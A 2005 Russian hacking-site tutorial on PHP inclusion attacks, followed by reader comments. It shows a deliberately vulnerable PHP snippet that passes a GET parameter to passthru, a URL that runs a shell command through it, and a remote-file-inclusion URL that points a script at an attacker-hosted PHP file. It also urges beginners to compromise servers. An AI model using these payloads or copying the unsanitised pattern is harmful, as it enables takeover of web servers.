Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиХакингPHP инклюдинг для новичков
© Cobalt 06.12.2005

Сегодня я расскажу тебе о типе атаки под названием php including. Если ты хоть чуть-чуть знаешь буржуйский, то тебе не сложно будет догадаться о смысле этого словосочетания. Если же в аглицком ты не шаришь, то я тебе переведу =).

Дословно - PHP включение. Т.е. включение в выполняемый код своего куска. Это возможно по тому что скрипт пхп выполнется непосредственно на сервере, соответственно, можно при благоприятных условиях заставить сервер выполнить свой код. Смысл атаки в следующем: имеется некий скрипт на пхп, то может быть что угодно, форум, гостевая книга, поисковик, просто движок сайта, это совершенно не играет роли. Главное, что этот скрипт не содержит проверки вводимых данных. Просто кодер поленился и не добавил ее туда, типа «Зачем еще пару лишних строчек писать? И так сойдет…». К чему такое наплевательское отношение может привести, я сейчас тебе покажу на простейшем примере. Давайте напишем маленький пхп скрипт:


      <?
       passthru($_GET[‘cmd’]);
      ?>

Назовем его для примера bug.php и выложим на хостинг с поддержкой пхп. Теперь наберем в браузере:

http://host.zone/bug.php?cmd=ls

Вау! Что мы видим? Результат выполнения команды «ls» =) Вот такая вот «бага» в скрипте может привести к взлому сайта. А все из-за того что мы поленились выполнить проверку параметра $_GET[‘cmd’].

Это был простейший пример чтобы продемонстрировать тебе смысл атаки типа пхп инклюдинг. На самом деле все обстоит несколько сложнее. Такого рода баг вы вряд ли встретите. Обычно в качестве параметра передают ссылку на другой скрипт, либо на какие-то другие данные. Но, что нам мешает вместо например

http://host.zone/script.php?file=data

Написать:

http://host.zone/script.php?file=http://my_host.zone/my_script.php ? =)

Вот так-то, ты и можешь поиметь чей-то сервант.

На этом собственно и все. Ты наверно часто встречал на сайтах типа www.securitylab.ru инфу об обнаружении возможности пхп инклюдинга в различных скриптах. Тебе конечно ни кто не мешает попытаться заюзать это дело и радоваться жизни. Но если ты настоящий хакер, а не простой скрипт кидис то ты все-таки дочитаешь эту статью до конца =).

Использовать баги найденные другими – каждый дурак может, ты попробуй сам найти какую-нибудь. Для этого тебе надо скачать оригинал стандартного скрипта который используется на многих сайтах. Например, в свое время очень часто баги находили в известном форуме phpBB2, его можно совершенно бесплатно скачать с официального сайта проекта. Потом ты должен проанализировать код. Полностью разобраться в том как работает этот самый скрипт. Потом уже дело техники, найти функцию которая обрабатывает потенциально опасные данные и в перед =).




© Cobalt 06.12.2005

e-Commerce Partners Network
fraIzer написал:

хмм не фантан, вообще не расписано, статья абы как, лишь бы написать, этой инфы вряд ли хватит, чтобы найти багу в скрипте, тем более уж в phpBB2...

sergio написал:

Это типа такого: Посмотрите как я крут! как много я знаю! Но вам не скажу...

sergio написал:

Такого рода статьи пишутся в угоду чувству собственной важности... чтоб потом зайти на сайт где это размещено и пустить тоненькую струйку слюны на клаву, или даже слезу, и подумать про себя с гордостью: ВОТ ОН КАКОЙ Я!

v373r написал:

посмотрите на год опубликования статьи прежде чем извергать слюну и брызгать пеной

test user написал:

Нормальная статься. Просто описания типа атаки или вида уязвимости, кому как угодно. Тот, кто что-то в этом понимает разберется что с этим делать.

гай_инкогнито написал:

для новичков вполне полезная информация..

TilerD написал:

Статья абсолютно бесполезна. Точ то можно что-то делать и чего-то при этом добиться известно по умолчанию. Следовательно автор статьи просто сотресает воздух.

полковник написал:

спасибо!

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
07.12.2018 10:48:30 Олег написал:
Перезвоните пожалуйста по телефону 8 (499) 322-46-85, Извините подвисла Станция, дождитесь...
Взлом домофонов
05.12.2018 16:57:14 Николай написал:
Перезвоните мне пожалуйста 8 (812)309-40-10, Николай.
Взлом домофонов
03.12.2018 17:19:57 Валерий написал:
Перезвоните пожалуйста по телефону 8 (499) 653 79 80 , Олег.
Взлом домофонов
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100